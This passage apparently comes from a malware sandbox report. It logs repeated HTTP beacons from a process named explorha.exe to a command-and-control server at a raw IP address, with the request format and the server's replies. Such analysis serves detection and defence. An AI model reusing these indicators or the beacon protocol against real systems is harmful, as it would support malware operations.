                                                                                                                                                                                                                                      Apr 19, 2024 03:29:49.955645084 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:50.198474884 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:50 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:50.199327946 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:50.447232962 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:50 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      39192.168.2.549832193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:50.847054958 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:51.094971895 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:50 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:51.104715109 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:51.357671976 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:51 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      40192.168.2.549836193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:51.728240013 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:51.976005077 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:51 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:51.977514029 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:52.229557991 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:52 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      41192.168.2.549839193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:52.583226919 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:52.831265926 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:52 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:52.832276106 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:53.082236052 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:52 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      42192.168.2.549845193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:53.539917946 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:53.788292885 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:53 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:53.791858912 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:54.046080112 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:53 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      43192.168.2.549848193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:54.485090017 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:54.734884977 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:54 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:54.735728979 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:54.994165897 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:54 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      44192.168.2.549851193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:55.343691111 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:55.585202932 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:55 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:55.586237907 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:55.832709074 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:55 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      45192.168.2.549854193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:56.196598053 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:56.448996067 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:56 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:56.450054884 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:56.707727909 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:56 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      46192.168.2.549856193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:57.069612026 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:57.318077087 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:57 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:57.318840981 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:57.571655989 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:57 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
